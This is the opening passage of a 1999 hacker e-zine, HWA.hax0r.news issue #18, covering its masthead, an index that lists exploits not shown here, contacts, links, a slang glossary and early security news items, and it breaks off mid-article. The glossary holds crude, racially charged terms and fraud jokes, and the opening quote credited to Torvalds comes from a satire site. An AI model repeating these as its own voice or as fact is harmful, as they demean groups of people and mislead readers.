Copy Link
Add to Bookmark
Report

hwa-hn18

eZine's profile picture
Published in 
HWA
 · 5 years ago

  

HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
and www.digitalgeeks.com

http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa


[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 18 Volume 1 1999 May 15th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================



Linus on life...
Torvalds said, "To explain human motivation, I've come up with Linus' Law, which
states the three motives that drive us: survival, social life, and entertainment."

He claimed that human history moves through each motive in cycles. "Think of sex,"
he said. "First, it was used for procreation to survive. Then it became a social
bonding tool. And now it's at its apex, as entertainment. Right now, I believe
we're moving into an entertainment society."
He added that Rome had also been an
entertainment society just before its powerful empire began to implode. And that
was when things began to go wrong -- at least, ethically speaking. Much to his
theoretical colleagues' chagrin, Torvalds revealed that he isn't interested in
human welfare, seeing as we're all doomed anyway. He'd much rather have fun than
think about all that stuff. While the panelists and audience listened in dismay,
Torvalds asserted that LINUX was good largely because it was entertaining, and that
he didn't worry much about poor people because the world is unfair and that's just
how it is.
- NewsTrolls





Synopsis
---------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.

It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>



@HWA

=-----------------------------------------------------------------------=

Welcome to HWA.hax0r.news ... #18

=-----------------------------------------------------------------------=



*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************


=-------------------------------------------------------------------------=

Issue #18


=--------------------------------------------------------------------------=




[ INDEX ]
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=

00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................

01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Mitnick Hearing..................................................
04.0 .. U.S Embassy and DOE sites cracked................................
05.0 .. "The Egg" `Cracked'..............................................
06.0 .. Student changes grades...........................................
07.0 .. IBM's Gift To Australia's Security...............................
08.0 .. SCREAM busted....................................................
09.0 .. Corel Hacked.....................................................
10.0 .. G0at Security calls it quits.....................................
11.0 .. Guninski uncovers yet another browser bug........................
12.0 .. Freaky to do a Macintosh related speech at Defcon7 ..............
13.0 .. IIS 2.0 "Security" by p0lix......................................
14.0 .. l0pht Security Advisory on MS IIS 4.0............................
15.0 .. X-Force Security advisory on Oracle 8: Multiple file system vulnerabilties
16.0 .. Microsoft Security Bulletin : File viewers vulnerability (MS99-13)
17.0 .. iParty pooper....................................................
18.0 .. Microsoft Security Bulletin: Excel 97 virus patch (MS99-14)......
19.0 .. LISA install leaves root access OpenLinux 2.2 ...................
20.0 .. BUGTRAQ list receives a plaque at SANS...........................
21.0 .. White House takes server offline after hack .....................
22.0 .. Feds to install IDS..............................................
23.0 .. CIH damages climb in China.......................................
24.0 .. Company claims damages from web defacement.......................
25.0 .. .gov sites hacked in protest of embassy bombing..................
26.0 .. Full Disclosure, the only way to go..............................
27.0 .. NIPC releases Hax0r Notes erh, Cyber Notes an online newsletter..
28.0 .. Cure for CIH.....................................................
29.0 .. Anonymous surfing from 303.org...................................
30.0 .. Yugoslavia offline...............................................
31.0 .. Spam Recycling site deals with spammers for you..................
32.0 .. quickie.c by Bronc Buster, a Cold Fusion vulnerability scanner...
33.0 .. sdtcm_convert local root overflow exploit for Sparc..............
34.0 .. lpset local root overflow exploit for solaris x86................
35.0 .. admintool local root exploit for solaris x86 machines............
36.0 .. dtprintinfo buffer overflow for solaris x86......................
37.0 .. Are we running out of IP numbers? how many class c's are left??..
27.1 .. And is webspace infinite?........................................
38.0 ,, Aibo, Sony's new robotic dog, at $2500US a pop don't dump your furby just yet...
39.0 .. IBM breaks more records with denser hard disk storage............
40.0 .. Carmack offers a bounty on Quake server DoS's and bug reports....
41.0 .. Hack into a webserver and win $10,000 ...........................
42.0 .. SSHD vulnerability found by JJF Hackers Team.....................
43.0 .. Neil Stephenson author of "Snow Crash" releases new book.........
44.0 .. Novell Netware 4.0 advisory by Nomad Mobile Research Center......
45.0 .. Penalties for Pirates may increase...............................
46.0 .. British Spy's site shutdown on Geocities?........................
47.0 .. The Virus Hype, Fact or Fiction by Thejian.......................
48.0 .. The Internet Fraud Council.......................................
49.0 .. Credit Card fraud under watchful eyes of eFalcon 'electronic brain'
50.0 .. [ISN] A ban on unauthorized computer access in Japan to be enacted
51.0 .. Virtual Vault Vulnerable.........................................
52.0 .. PoC GalaDRiel Corel virus resurfaces.............................
53.0 .. Web attacks a 'nuisance' says DoD................................
54.0 .. GPS's have a Y2K problem early...................................
55.0 .. Retinal scans?...................................................
56.0 .. FreeBSD high speed SYNflood patch................................
=--------------------------------------------------------------------------=


AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: Aug19th-22nd Niagara Falls... .................

HA.HA .. Humour and puzzles ............................................

Hey You!........................................................
=------=........................................................

Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................

SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................

=--------------------------------------------------------------------------=

@HWA'99


00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD


Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]



00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.

Send all goodies to:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy"
will do ... ;-) thanx.



Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.

If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net

@HWA



00.2 Sources ***
~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.

News & I/O zine ................. <a href="
http://www.antionline.com/">http://www.antionline.com/</a>
Back Orifice/cDc..................<a href="
http://www.cultdeadcow.com/">http://www.cultdeadcow.com/</a>
News site (HNN) .....,............<a href="
http://www.hackernews.com/">http://www.hackernews.com/</a>
Help Net Security.................<a href="
http://net-security.org/">http://net-security.org/</a>
News,Advisories,++ ...............<a href="
http://www.l0pht.com/">http://www.l0pht.com/</a>
NewsTrolls .......................<a href="
http://www.newstrolls.com/">http://www.newstrolls.com/</a>
News + Exploit archive ...........<a href="
http://www.rootshell.com/beta/news.html">http://www.rootshell.com/beta/news.html</a>
CuD Computer Underground Digest...<a href="
http://www.soci.niu.edu/~cudigest">http://www.soci.niu.edu/~cudigest</a>
News site+........................<a href="
http://www.zdnet.com/">http://www.zdnet.com/</a>
News site+Security................<a href="
http://www.gammaforce.org/">http://www.gammaforce.org/</a>
News site+Security................<a href="
http://www.projectgamma.com/">http://www.projectgamma.com/</a>
News site+Security................<a href="
http://securityhole.8m.com/">http://securityhole.8m.com/</a>
News site+Security related site...<a href="
http://www.403-security.org/">http://www.403-security.org/</a>
News/Humour site+ ................<a href="
http://www.innerpulse.com/>http://www.innerpulse.com</a>

+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...


http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
<a href="http://www.cnn.com/SEARCH/"
>Link</a>

http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
<a href="http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0"
>Link</a>

http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
<a href="http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack"
>Link</a>

http://www.ottawacitizen.com/business/
<a href="http://www.ottawacitizen.com/business/"
>Link</a>

http://search.yahoo.com.sg/search/news_sg?p=hack
<a href="http://search.yahoo.com.sg/search/news_sg?p=hack"
>Link</a>

http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
<a href="http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack"
>Link</a>

http://www.zdnet.com/zdtv/cybercrime/
<a href="http://www.zdnet.com/zdtv/cybercrime/"
>Link</a>

http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
<a href="http://www.zdnet.com/zdtv/cybercrime/chaostheory/"
>Link</a>

NOTE: See appendices for details on other links.



http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
<a href="http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm"
>Link</a>

http://freespeech.org/eua/ Electronic Underground Affiliation
<a href="http://freespeech.org/eua/"
>Link</a>

http://ech0.cjb.net ech0 Security
<a href="http://ech0.cjb.net"
>Link</a>

http://net-security.org Net Security
<a href="http://net-security.org"
>Link</a>

http://www.403-security.org Daily news and security related site
<a href="http://www.403-security.org"
>Link</a>


Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.


- Ed

Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html


THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;

http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

<a href="http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.

I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.

Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
reflector address if the response does not meet the above criteria.

Remember: YOYOW.

You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)



Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe,
visit http://www.counterpane.com/unsubform.html.  Back issues are available
on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW.  He
is a frequent writer and lecturer on cryptography.


CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
     
                      ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest



[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed


Subscribe: mail majordomo@repsec.com with "subscribe isn".



@HWA


00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black


Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland

And unofficially yet contributing too much to ignore ;)

Spikeman .........................: World media

Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed

http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)


*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************

:-p


1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...


@HWA



00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.

In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff


@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:

Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.

@HWA - see EoA ;-)

!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)

AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??

*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's

CCC - Chaos Computer Club (Germany)

*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed

Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC - End of Commentary

EoA - End of Article or more commonly @HWA

EoF - End of file

EoD - End of diatribe (AOL'ers: look it up)

FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)

du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.

*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'

2 - A tool for cutting sheet metal.

HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&

HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI- Missing on/from IRC

NFC - Depends on context: No Further Comment or No Fucking Comment

NFR - Network Flight Recorder (Do a websearch) see 0wn3d

NFW - No fuckin'way

*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes

PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism

*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d

*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.

TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA - To Be Arranged/To Be Announced also 2ba

TFS - Tough fucking shit.

*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>

2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

*wtf - what the fuck

*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.

@HWA


-=- :. .: -=-




01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.


* all the people who sent in cool emails and support

FProphet Pyra TwstdPair _NeM_
D----Y Kevin Mitnick (watch yer back) Dicentra
vexxation sAs72 Spikeman Astral
p0lix Vexx g0at security


and the #innerpulse, crew and some inhabitants of #leetchans ....
although I use the term 'leet loosely these days, <k0ff><snicker> ;)


kewl sites:

+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.genocide2600.com/~spikeman/
+ http://www.genocide2600.com/~tattooman/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA


01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't
always popular..."

- FProphet '99



+++ When was the last time you backed up your important data?



++ ICQ99 network password puller

Approved-By: aleph1@UNDERGROUND.ORG
Date: Mon, 10 May 1999 09:29:01 -0400
From: Dmitri Alperovitch <dmitri@ENCRSOFT.COM>
Subject: ICQ Password Revealer
To: BUGTRAQ@netspace.org

Hi.

A few weeks ago, it was posted that ICQ99 stores the password
used to access the ICQ network in plain-text in the .DAT files.
We have written a program that demonstrates this by parsing
these .DAT files for password and showing it to the user.
It can be downloaded at http://www.encrsoft.com/products.html#icqpass

Note: The option to save password can be turned off in ICQ's
Security & Privacy settings.

Yours truly,


Dmitri Alperovitch
Encryption Software - Developers of TSM for ICQ, an ICQ encryption add-on
http://www.encrsoft.com
dmitri@encrsoft.com


++ Friday May 14th

From HNN http://www.hackernews.com/

Zyklon Busted

contributed by Zyklon
HNN has received a report that a grand jury has indicted
Zyklon. The reports indicate that he has been indicted
on various computer related crimes and that he will be
officially charged on May 24th. It is unknown at this
time exactly what the charges will be or what crimes
have supposedly been committed




++ Japan Enacts Cracking Ban

From HNN http://www.hackernews.com/

contributed by Hisir0
A Japanese bill sponsored by the National Police Agency,
the Ministry of Posts and Telecommunications, and the
Ministry of International Trade and Industry (MITI) has
been submitted to the Diet after it was adopted at a
Cabinet meeting on April 16. It is expected to pass the
Diet by the end of June. This bill will outlaw
unauthorized access to computer systems in Japan and
will carry penalties of fines and imprisonment.

Asia BizTech
http://www.nikkeibp.asiabiztech.com/wcs/frm/leaf?CID=onair/asabt/news/70042



++ PRIVACY ISSUES

From http://www.net-security.org/

by BHZ, Thursday 13th May 1999 on 3:38 pm CET
Do Web sites tell their visitors whether they collect personal data and how they use
it? In a separate sampling of 364 randomly selected sites, 65.7 percent gave privacy
notices (much better then last year when only 14% of sites gave those kind of
notices). Read about the study on ZdNet.
http://www.zdnet.com/zdnn/stories/news/0,4586,2258012,00.html?chkpt=hpqs014


++ Don't delete Microsoft files !

From www.403-security.org

Astral 11.05.1999 12:20

Office 2000, would be well advised to avoid trying to reduce the size of its massive footprint
by deleting files to recover space. Even the most innocuous little text files seem to have some
strange and arcane purpose in Bill’s Great Scheme Of Things.For example deleting file DELME.txt
is going cause starting install procedure every time Office files are executed.


Mucho thanks to Spikeman for directing his efforts to our cause of bringing
you the news we want to read about in a timely manner ... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

No mail for sharing this week!

================================================================

@HWA


02.0 From the editor.
~~~~~~~~~~~~~~~~

#include <stdio.h>
#include <thoughts.h>
#include <backup.h>

main()
{
printf ("Read commented source!\n\n");

/*
* Issue #18 'w00ten'
*
*
*
*
*
*
*
*/

printf ("EoF.\n");
}


Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.


@HWA

03.0 Mitnick Hearing
~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/

May 10th

Mitnick Hearing Scheduled for Tomorrow

contributed by punkis
The recent release of letters claiming outrages damages from companies allegedly
targeted by Kevin Mitnick have not pleased the prosecution. The prosecution has
filed a motion to have the defense held in contempt for releasing the information.
A hearing scheduled for tomorrow originally scheduled to determine Kevin's
future earnings potential may also address this motion. The hearing is tomorrow
(Tuesday) at 10:00 at: U.S. Central District of California Western Division - Spring
Street Court House, 312 N. Spring Street, Los Angeles, CA 90012. If you are in the
area stop in and show Kevin some support. It should be some exciting drama.


May 11th

This hearing was cancelled, no news on when it is to be rescheduled.

@HWA


04.0 U.S Embassy and DOE sites cracked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

US Embassy and DOE web sites Cracked

From HNN http://www.hackernews.com/

contributed by cult hero
In response to the recent NATO bombing of the Chinese embassy in Belgrade some people have started
